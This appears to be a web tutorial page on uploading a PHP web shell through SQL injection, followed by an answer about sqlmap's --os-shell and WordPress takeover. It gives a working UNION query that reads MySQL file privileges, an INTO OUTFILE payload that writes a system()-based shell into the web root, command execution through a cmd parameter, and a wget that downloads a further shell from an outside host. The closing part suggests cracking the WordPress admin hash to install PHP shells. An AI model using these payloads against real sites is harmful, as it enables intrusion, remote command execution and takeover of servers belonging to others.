Uploading Shell Using SQLI

Yes, You can write your shell onto the web server with SQL statements without logging into the admin panel or any other control panel.

But for this you have to met certain requirements:

  1. Your must have write privileges and a writable directory (where you have to upload your shell)
  2. Root Path (i.e /var/www/website/)
  3. Magic Quotes must be enabled

Check for write privileges

Now the question is how to check if you have write permissions? What you can simply do is read file_priv from the mysql.user table:

union select 1,2,3,concat(user(),0x3a,file_priv) from mysql.user--

If it says Y after your current user, then you are lucky and you have write privileges.

Create a file to receive the shell

Now it's time to make use of MySQL statements. We're going to use INTO OUTFILE, which writes your selected rows onto a file. The basic syntax is:

select column_name from table_name into outfile "filepath/file.extension

Something like this should create a file named shell.php in the website directory and write that PHP code inside it:

http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"

Access the shell

Now we can access our shell by visiting http://website.com/shell.php?cmd=whoami. You can run any command after cmd=. You can now upload a ready-made shellcode to the server using curl or `wget (on Linux servers):

`http://website.com/shell.php?cmd=wget http://othersite.com/shell.txt -O code.php`

And then you can access your shell with:

http://website.com/code.php

Hope you understood everything :)


First of all if you are debugging a sqlmap failure you need to turn up the verbosity. No one can actually answer this question, because you did not gather the appropriate information.

The --os-shell works for MySQL by attempting to use an into outfile to write a file to the web root. This can fail for any number of reasons. The most common reason being that the database and web server and different machines. Ubuntu's default AppArmor rule sets forbid MySQL from writing to /var/www/. Also, into outfile requires file privileges that should never be granted (but often is). You could try using sqlmap's file-io functionality to read and write to the remote file system.

in the context of this application, dumping the contents of the Wordpress MySQL database will yield the administrator's password hash. Cracking this hash will yield a Wordpress admin account which almost always has the ability to upload and install Wordpress extensions.... or PHP shells.

Tags:

Mysql

Sql Injection

Recent Posts